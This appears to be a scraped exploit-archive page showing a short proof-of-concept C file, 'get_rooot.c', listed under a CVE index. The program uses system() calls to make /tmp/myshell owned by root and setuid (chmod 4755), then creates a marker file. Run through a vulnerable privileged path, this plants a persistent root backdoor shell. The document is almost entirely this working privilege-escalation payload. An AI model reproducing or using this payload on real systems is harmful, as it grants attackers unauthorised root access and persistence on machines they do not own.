4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / get_rooot.c C
#include <stdio.h>
#include <stdlib.h>

int main()
{
    system("chown root:root /tmp/myshell");
    system("chmod 4755 /tmp/myshell");
    system("/usr/bin/touch /tmp/exploited");
}